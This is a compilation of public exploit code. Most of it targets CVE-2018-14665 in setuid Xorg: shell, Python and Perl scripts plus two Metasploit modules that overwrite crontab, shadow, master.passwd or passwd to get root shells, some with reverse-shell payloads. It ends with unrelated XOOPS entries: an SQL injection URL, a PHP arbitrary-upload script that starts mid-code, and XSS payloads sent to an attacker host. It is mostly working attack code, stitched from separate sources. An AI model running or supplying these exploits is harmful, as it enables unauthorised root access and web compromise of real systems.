# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.exploit-db.com/exploits/45697/
# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
#
# Usage:
# blobfish$ chmod +x raptor_xorgasm
# blobfish$ ./raptor_xorgasm
# [...]
# Be patient for a couple of minutes...
# [...]
# Don't forget to cleanup and run crontab -e to reload the crontab.
# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab
# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned
# blobfish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# OpenBSD 6.4 (Xorg 1.19.6) [tested]
# OpenBSD 6.3 (Xorg 1.19.6) [tested]
#
echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
# prepare the payload
cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm
# trigger the bug
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg
# run the setuid shell
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned
#!/bin/sh
# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)
# Date: 2018-11-25
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: Oracle Solaris 11.4
# CVE : CVE-2018-14665
#
# raptor_solgasm - xorg-x11-server LPE via Solaris inittab
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# "In video games, this is what they call respawning" -- Nick Sax
#
# This exploit targets /etc/inittab in order to escalate privileges to root
# on Solaris 11 (no need to be connected to a physical console). Messing with
# inittab is considerably dangerous and you may trash your system, however the
# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't
# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_solgasm
# raptor@stalker:~$ ./raptor_solgasm
# [...]
# Now please be patient for a few minutes...
# [...]
# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab
# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab
# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old
# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned
# root@stalker:/etc# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
#
echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
# prepare the payload
cat << EOF > /tmp/solgasm
cp /bin/zsh /tmp/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /tmp/pwned
chmod 4777 /tmp/pwned
EOF
chmod +x /tmp/solgasm
# trigger the bug
PWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)
cd /etc
Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 &
sleep 5
pkill Xorg
# run the setuid shell
echo
echo "Now please be patient for a few minutes..."
echo
until [ -u /tmp/pwned ]; do sleep 1; done
echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab"
ls -l /etc/inittab*
ls -l /tmp/pwned
sleep 1
/tmp/pwned
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -
EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
#!/bin/sh
#
# raptor_xorgy - xorg-x11-server LPE via modulepath switch
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# This exploit variant triggers the bug in the -modulepath command line switch
# to load a malicious X11 module in order to escalate privileges to root on
# vulnerable systems. This technique is less invasive than exploiting the
# -logfile switch, however the gcc compiler must be present in order for it to
# work out of the box. Alternatively, you must use a pre-compiled malicious .so
# compatible with the target system and modify the exploit accordingly.
#
# It works very reliably on Solaris 11.4 and should work on most vulnerable
# Linux distributions (though I haven't tested it). For some reason, it fails to
# obtain uid 0 on OpenBSD... They might have an additional protection in place.
#
# Thanks to @alanc and @nushinde for discussing this alternative vector.
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm
# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html
# https://nvd.nist.gov/vuln/detail/CVE-2006-0745
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xorgy
# raptor@stalker:~$ ./raptor_xorgy
# [...]
# root@stalker:~# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
# CentOS Linux 7 [untested, it should work]
# Red Hat Enterprise Linux 7 [untested]
# Ubuntu Linux 18.10 [untested]
# Ubuntu Linux 18.04 LTS [untested]
# Ubuntu Linux 16.04 LTS [untested]
# Debian GNU/Linux 9 [untested]
# [...]
#
echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
# prepare the payload
cat << EOF > /tmp/pwned.c
_init()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
EOF
# libglx.so should be a good target, refer to Xorg logs for other candidates
gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so
if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi
# trigger the bug
echo "Got root?"
Xorg -modulepath ",/tmp" :1
# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
# Date: 2018-11-07
# Exploit Author: @bolonobolo
# Vendor Homepage: https://www.x.org/
# Version: 1.19.5
# Tested on: RHEL 7.3 && 7.5
# CVE : CVE-2018-14665
# Explanation
# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user
# has to be logged in trought console at the moment the PE script launched.
# In fact during the logged in session of the legitimate non-root user,
# a file with the name of the non-root user will be created in the /var/run/console folder.
# With that file present, the same non-root user can launch a Xorg command via SSH.
#
# Usage: $ python poc.py
# $ python poc.py
# [*] Waiting for bolo to connect to the console
# [*] OK --> bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
#
# ... cut Xorg output ...
#
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id && whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#
#!/usr/bin/python
import os
import getpass
import subprocess
userList = []
path="/var/run/console/"
def getWhoami():
return getpass.getuser()
def getConsole(path):
p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
(console, err) = p.communicate()
consoleList = str.splitlines(console)
return consoleList
def payload():
f = open("/tmp/payload", "w")
payload = ("cp /bin/sh /usr/local/bin/shell\n"
"echo \"#include <stdio.h> \" > /tmp/shell.c\n"
"echo \"#include <stdlib.h>\" >> /tmp/shell.c\n"
"echo \"#include <sys/types.h>\" >> /tmp/shell.c\n"
"echo \"#include <unistd.h>\" >> /tmp/shell.c\n"
"echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
"gcc /tmp/shell.c -o /usr/local/bin/shell\n"
"chmod 4777 /usr/local/bin/shell\n")
f.write(payload)
def executePayload():
os.system("chmod +x /tmp/payload")
os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &")
print "[*] crontab overwritten"
os.system("sleep 5")
os.system("pkill Xorg")
print "[*] Xorg killed"
os.system("sleep 120")
return
def main():
whoami = getWhoami()
print "[*] Waiting for " + whoami + " to connect to the console"
i = 0
while (i == 0):
consoleList = getConsole(path)
for user in consoleList:
if user == whoami :
print "[*] OK --> " + user + " console opened"
i = 1
print "[*] Building root shell wait 2 minutes"
payload()
executePayload()
print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
os.system("/usr/local/bin/shell")
if __name__ == '__main__':
main()
# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
# # whoami
# root
#!/usr/bin/perl
print "[+] AIX X11 server local root exploit\n";
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg = `command -v Xorg`);
if ($xorg eq ""){
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
exit;
}
# Check ksh93 is in path
chomp($ksh = `command -v ksh93`);
if ($ksh eq ""){
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
exit;
}
# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array = <$passwd_fh>);
close($passwd_fh);
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd = '';
foreach my $user (@users)
{
$user .= ":";
foreach my $line (@passwd_array)
{
if (index($line, $user) == 0) {
$users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
}
}
}
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log
print "[-] Generating Xorg command \n";
$blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';
print "[-] Opening /tmp/wow.ksh \n";
open($fr, '>', "/tmp/wow.ksh");
# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;
# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");
# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
def initialize(info = {})
super(update_info(info,
'Name' => 'Xorg X11 Server SUID privilege escalation',
'Description' => %q{
This module attempts to gain root privileges with SUID Xorg X11 server
versions 1.19.0 < 1.20.3.
A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root
privileges.
This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
CentOS default install will require console auth for the users session.
Cron launches the payload so if Selinux is enforcing exploitation
may still be possible, but the module will bail.
Xorg must have SUID permissions and may not start if running.
On exploitation a crontab.old backup file will be created by Xorg.
This module will remove the .old file and restore crontab after
successful exploitation. Failed exploitation may result in a corrupted
crontab. On successful exploitation artifacts will be created consistant
with starting Xorg and running a cron.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Narendra Shinde', # Discovery and exploit
'Raptor - 0xdea', # Modified exploit for cron
'Aaron Ringo', # Metasploit module
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
],
'DisclosureDate' => 'Oct 25 2018',
'References' =>
[
[ 'CVE', '2018-14665' ],
[ 'BID', '105741' ],
[ 'EDB', '45697' ],
[ 'EDB', '45742' ],
[ 'EDB', '45832' ],
[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
[ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
],
'Platform' => %w[openbsd linux],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'SessionTypes' => %w[shell meterpreter],
'Targets' =>
[
['OpenBSD', {
'Platform' => 'unix',
'Arch' => [ ARCH_CMD ] } ],
['Linux x64', {
'Platform' => 'linux',
'Arch' => [ ARCH_X64 ] } ],
['Linux x86', {
'Platform' => 'linux',
'Arch' => [ ARCH_X86 ] } ]
],
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_openssl',
'WfsDelay' => 120
},
'DefaultTarget' => 0))
register_advanced_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
]
)
end
def check
# linux checks
uname = cmd_exec "uname"
if uname =~ /linux/i
vprint_status "Running additional check for Linux"
if datastore['ConsoleLock']
user = cmd_exec "id -un"
unless exist? "/var/run/console/#{user}"
vprint_error "No console lock for #{user}"
return CheckCode::Safe
end
vprint_good "Console lock for #{user}"
end
if selinux_installed?
if selinux_enforcing?
vprint_error 'Selinux is enforcing'
return CheckCode::Safe
end
end
vprint_good "Selinux is not an issue"
end
# suid program check
xorg_path = cmd_exec "command -v Xorg"
unless xorg_path.include?("Xorg")
vprint_error "Could not find Xorg executable"
return CheckCode::Safe
end
vprint_good "Xorg path found at #{xorg_path}"
unless setuid? xorg_path
vprint_error "Xorg binary #{xorg_path} is not SUID"
return CheckCode::Safe
end
vprint_good "Xorg binary #{xorg_path} is SUID"
# version check
x_version = cmd_exec "Xorg -version"
if x_version.include?("Release Date")
v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
vprint_error "Xorg version #{v} not supported"
return CheckCode::Safe
end
elsif x_version.include?("Fatal server error")
vprint_error "User probably does not have console auth"
vprint_error "Below is Xorg -version output"
vprint_error x_version
return CheckCode::Safe
else
vprint_warning "Could not parse Xorg -version output"
return CheckCode::Appears
end
vprint_good "Xorg version #{v} is vulnerable"
# process check for /X
proc_list = cmd_exec "ps ax"
if proc_list.include?('/X ')
vprint_warning('Xorg in process list')
return CheckCode::Appears
end
vprint_good('Xorg does not appear running')
return CheckCode::Vulnerable
end
def on_new_session(session)
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\""
else
session.shell_command(@clean_up)
end
print_good "Returning session after cleaning"
ensure
super
end
def exploit
check_status = check
if check_status == CheckCode::Appears
print_warning 'Could not get version or Xorg process possibly running, may fail'
elsif check_status == CheckCode::Safe
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'This session already has root privileges'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
print_good 'Passed all initial checks for exploit'
pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
@clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
xdisplay = datastore['Xdisplay']
# Uploading file crontab will run
print_status 'Uploading your payload, this could take a while'
if payload.arch.first == 'cmd'
write_file(pscript, payload.encoded)
else
write_file(pscript, generate_payload_exe)
end
register_file_for_cleanup pscript
chmod pscript
# Exploit steps on crontab so backing it up
cmd_exec "cat /etc/crontab > #{pscript}.b"
# Actual exploit with cron overwrite
print_status 'Trying /etc/crontab overwrite'
cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
Rex.sleep 5
cmd_exec "pkill Xorg"
Rex.sleep 1
cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
unless cron_check.include? pscript
rm_f "#{pscript}.b"
print_error 'Deleting crontab backup'
fail_with Failure::NotVulnerable, '/etc/crontab not modified'
end
print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Xorg X11 Server Local Privilege Escalation',
'Description' => %q(
WARNING: Successful execution of this module results in /etc/passwd being overwritten.
This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root
privileges.
This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
Due to permission restrictions of the crontab in AIX, this module does not use cron,
and instead overwrites /etc/passwd in order to create a new user with root privileges.
All currently logged in users need to be included when /etc/passwd is overwritten,
else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
overwriting /etc/passwd.
),
'Author' =>
[
'Narendra Shinde', # Discovery and original FreeBSD exploit
'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 25 2018',
'Notes' =>
{
'SideEffects' => [ CONFIG_CHANGES ]
},
'References' =>
[
['CVE', '2018-14665'],
['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],
['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],
['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],
['EDB', '45938']
],
'Platform' => ['unix'],
'Arch' => [ARCH_CMD],
'SessionTypes' => ['shell'],
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl'
}
},
'DefaultOptions' => {
'Payload' => 'cmd/unix/reverse_perl'
},
'Targets' =>
[
['IBM AIX Version 6.1', {}],
['IBM AIX Version 7.1', {}],
['IBM AIX Version 7.2', {}]
],
'DefaultTarget' => 1))
register_options(
[
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
)
end
def check
xorg_path = cmd_exec('command -v Xorg')
if !xorg_path.include?('Xorg')
print_error('Could not find Xorg executable')
return Exploit::CheckCode::Safe
end
ksh93_path = cmd_exec('command -v ksh93')
if !ksh93_path.include?('ksh')
print_error('Could not find Ksh93 executable')
return Exploit::CheckCode::Safe
end
if !xorg_vulnerable?
print_error('Xorg version is not vulnerable')
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Appears
end
def exploit
status = check
if status == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, '')
end
if !writable?(datastore['WritableDir'])
fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable")
end
xorg_path = cmd_exec('command -v Xorg')
ksh93_path = cmd_exec('command -v ksh93')
xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])
xorg_script_path = "#{datastore['WritableDir']}/wow.ksh"
upload_and_chmodx(xorg_script_path, xorg_payload)
passwd_backup = "#{datastore['WritableDir']}/passwd.backup"
print_status("Backing up /etc/passwd to #{passwd_backup}")
cmd_exec("cp /etc/passwd #{passwd_backup}")
register_file_for_cleanup(passwd_backup)
print_status("Executing #{xorg_script_path}")
cmd_exec(xorg_script_path)
print_status('Checking if we are root')
if root?
shell_payload = %(#!#{ksh93_path}
#{payload.encoded}
)
shell_script_path = "#{datastore['WritableDir']}/wowee.ksh"
upload_and_chmodx(shell_script_path, shell_payload)
print_status('Executing shell payload')
cmd_exec("#{ksh93_path} -c \"echo #{shell_script_path} | su - wow &\"")
print_status('Restoring original /etc/passwd')
cmd_exec("su - wow -c \"cp #{passwd_backup} /etc/passwd\"")
else
fail_with(Failure::PayloadFailed, '')
end
end
def generate_xorg_payload(xorg_path, ksh93_path, writabledir)
passwd_file = read_file('/etc/passwd')
passwd_array = passwd_file.split("\n")
print_status('Retrieving currently logged in users')
users = cmd_exec('who | cut -d\' \' -f1 | sort | uniq')
users << "\n"
users_array = users.split("\n")
logged_in_users = ''
if !users_array.empty?
users_array.each do |user|
user << ':'
passwd_array.each do |line|
if line.index(user) == 0
logged_in_users << '\n'
logged_in_users << line
end
end
end
end
passwd_data = "$'#{logged_in_users}\\nwow::0:0::/:/usr/bin/ksh\\n#'"
subdir_count = writabledir.count('/')
relative_passwd = '../' * subdir_count + '../../etc/passwd'
return %(#!#{ksh93_path}
#{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1
)
end
def xorg_vulnerable?
version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \'{ print $2 }\'')
print_status("Xorg version is #{version}")
semantic_version = Gem::Version.new(version)
vulnerable_versions = [
['6.1.9.0', '6.1.9.100'],
['7.1.4.0', '7.1.4.30'],
['7.1.5.0', '7.1.5.31'],
['7.2.0.0', '7.2.0.1'],
['7.2.1.0', '7.2.1.0'],
['7.2.2.0', '7.2.2.0'],
['7.2.3.0', '7.2.3.15']
]
vulnerable_versions.each do |version_pair|
if semantic_version >= Gem::Version.new(version_pair[0]) &&
semantic_version <= Gem::Version.new(version_pair[1])
return true
end
end
return false
end
def root?
id_output = cmd_exec('su - wow -c "id"')
if id_output.include?('euid=0') || id_output.include?('uid=0')
print_good('Got root!')
return true
end
print_error('Not root')
false
end
def upload_and_chmodx(path, data)
print_status("Writing to #{path}")
rm_f(path)
write_file(path, data)
cmd_exec("chmod 0555 '#{path}'")
register_file_for_cleanup(path)
end
end
source: https://www.securityfocus.com/bid/67460/info
Glossaire module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Glossaire 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION]
source: https://www.securityfocus.com/bid/53945/info
FileManager is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
nj3ct0rK3d-Sh3lL#";
$uploadfile = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($uploadfile != "exit")
{
$ch = curl_init("http://www.example.com/modules/fileManager/xupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'path'=>'img'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
}
else break;
?>
# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-12
# Exploit Author: tmrswrr
# Vendor Homepage: https://xoops.org/
# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
# Version: 2.5.10
# Tested : https://www.softaculous.com/apps/cms/Xoops
--- Description ---
1) Login admin panel and click Image Manager , choose Add Category :
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
Payload: <script>alert(1)</script>
3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
source: https://www.securityfocus.com/bid/46916/info
XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
XOOPS 2.5.0 is vulnerable; other versions may also be affected.
Parameter: module
http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe
Parameter: module[]
[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]
Parameter: memberslist_id[]
[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=users&selgroups=2
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
memberslist_id%5b%5d="><script>alert(1)</script>&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group
